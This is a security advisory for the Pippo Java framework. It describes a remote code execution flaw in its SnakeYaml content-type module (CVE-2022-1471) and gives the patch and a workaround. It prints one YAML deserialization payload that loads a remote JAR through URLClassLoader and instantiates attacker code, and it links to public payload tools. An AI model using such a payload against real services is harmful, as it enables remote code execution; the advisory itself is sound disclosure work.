Impact

Remote Code Execution Vulnerability when the SnakeYamlEngine ContentTypeEngine is installed in an application. This is because the SnakeYaml deserializer by default allows for arbitrary deserialization of Java objects.

This is due to CVE-2022-1471

Vulnerability

This vulnerability exists because SnakeYaml enables the loading of arbitrary object graphs. For example, the following payload will allow an attacker to cause the JVM to class load an external JAR file and instantiate an attacker controlled instance of the javax.script.ScriptEngineFactory via the Java service loader.

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://localhost:8080/"]]]]

The following code paths are vulnerable to this:

• https://github.com/pippo-java/pippo/blob/3118963d7ad11360e6d902ed7ac32ddbcd21af8d/pippo-content-type-parent/pippo-snakeyaml/src/main/java/ro/pippo/snakeyaml/SnakeYamlEngine.java#L45
• https://github.com/pippo-java/pippo/blob/3118963d7ad11360e6d902ed7ac32ddbcd21af8d/pippo-content-type-parent/pippo-snakeyaml/src/main/java/ro/pippo/snakeyaml/SnakeYamlEngine.java#L50

Patches

Resolved in this commit with the update of SnakeYaml to 2.0:

• pippo-java/pippo@5d412c0

Workarounds

Remove the ro.pippo:pippo-snakeyaml module from your application.

References

• https://github.com/mbechler/marshalsec
• https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true
• https://github.com/artsploit/yaml-payload